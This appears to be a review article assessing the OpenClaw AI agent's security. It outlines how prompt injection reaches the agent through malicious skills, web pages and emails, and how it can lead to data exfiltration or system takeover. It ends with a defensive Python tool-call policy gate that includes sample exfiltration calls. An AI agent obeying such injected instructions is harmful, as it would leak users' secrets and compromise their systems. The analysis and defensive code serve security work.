OpenClaw Unveiled: Utility Meets Unresolved Security Concerns Amidst AI Hype
The recent surge in AI agent excitement has brought OpenClaw (formerly ClawdBot) and the social network Moltbook into focus, prompting a detailed evaluation that reveals a more nuanced picture than commonly presented. While acknowledging the impressive feat of a single developer creating OpenClaw, the analysis points to significant challenges in both practical utility and, critically, security. Many users find existing, specialized AI tools—such as Google’s AI mode, Deep Research on Gemini, or SuperGrok for X—to be more effective and secure for common tasks like web research, obviating the need for a general-purpose agent with broad system access. Furthermore, the inherent unpredictability of Large Language Models (LLMs) and the necessary broad permissions for comprehensive automation create a trust dilemma, making users hesitant to grant access to sensitive data or core system functionalities.
The primary concern revolves around the persistent and fundamentally unsolved problem of prompt injection, which presents a significant attack surface. OpenClaw’s official security documentation confirms that prompt injection cannot be fully mitigated in LLMs, irrespective of model advancements. Attack vectors are manifold: malicious skills distributed through platforms like ClawHub (despite recent security improvements), embedded prompts on internet-accessed websites, and even processed emails can all trick the AI into executing unintended commands. These vulnerabilities open the door to severe consequences, including data exfiltration—where an attacker could compel the AI to gather and transmit sensitive information like passwords, secrets, or credit card numbers—and even system takeover, potentially transforming a VPS into a botnet or facilitating the installation of malicious software.

While sandboxing (e.g., Docker containers) and running on a VPS can reduce the blast radius, they do not eliminate the risk of data exfiltration. Moreover, continuous manual approval for tasks, while enhancing security, defeats the core promise of an autonomous assistant, leading to user fatigue and a potential lapse in oversight. The review also notes the poor quality of OpenClaw’s documentation, making secure configuration an arduous task.

In a separate assessment, Moltbook, described as an ‘AI-only social network,’ was criticized for being ‘human-orchestrated,’ ‘fake,’ and having ‘gaping security issues,’ questioning its overall value proposition.
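Returning to the sandboxing caveat above: a container limits what a hijacked agent can touch locally, but not what it sends out, and blanket manual approval causes fatigue. One way to address both is a policy gate at the tool layer that auto-allows low-risk calls, holds only high-risk tools for a human, and enforces egress and outbound-secret checks automatically. The following is an added Python illustration, not OpenClaw's code; the tool names, egress allowlist and secret patterns are assumptions.

```python
import re
from urllib.parse import urlparse

# Hypothetical agent tool layer (constructed here, not OpenClaw's code):
# every tool call the model proposes passes through decide() before it runs.
ALLOWED_EGRESS = {"api.example-calendar.com", "mail.example.com"}  # assumed allowlist
HIGH_RISK_TOOLS = {"shell", "write_file", "send_email"}            # assumed tool names
SECRET_PATTERNS = [
    re.compile(r"(?i)\b(api[_-]?key|password|secret|token)\b\s*[:=]\s*\S+"),
    re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
]

def looks_like_secret(text: str) -> bool:
    """Cheap outbound scan: if an injected instruction makes the model paste
    credentials into a request, this trips regardless of destination."""
    return any(p.search(text) for p in SECRET_PATTERNS)

def decide(tool: str, args: dict) -> str:
    """Return 'allow', 'approve' (hold for a human) or 'deny'.

    Only high-risk tools need a human click, which keeps approval fatigue
    down; egress and secret checks are enforced automatically because a
    container boundary alone does not stop data leaving over HTTP."""
    payload = " ".join(str(v) for v in args.values())
    if looks_like_secret(payload):
        return "deny"
    if tool == "http_request":
        host = (urlparse(args.get("url", "")).hostname or "").lower()
        return "allow" if host in ALLOWED_EGRESS else "deny"
    if tool in HIGH_RISK_TOOLS:
        return "approve"
    return "allow"

if __name__ == "__main__":
    # Constructed sample calls: the first two are the exfiltration shapes
    # the page warns about and the policy should stop them without a human.
    samples = [
        ("http_request", {"url": "https://attacker.invalid/c", "body": "notes dump"}),
        ("http_request", {"url": "https://api.example-calendar.com/v1", "body": "token=abc123"}),
        ("http_request", {"url": "https://api.example-calendar.com/v1", "body": "title=standup"}),
        ("shell", {"cmd": "ls ~"}),
        ("read_file", {"path": "/tmp/notes.txt"}),
    ]
    for tool, args in samples:
        print(f"{tool:13} -> {decide(tool, args)}")
```

The secret regexes are deliberately narrow to avoid false denies; in practice the deny and approve decisions should also be logged so that an injection attempt leaves an audit trail.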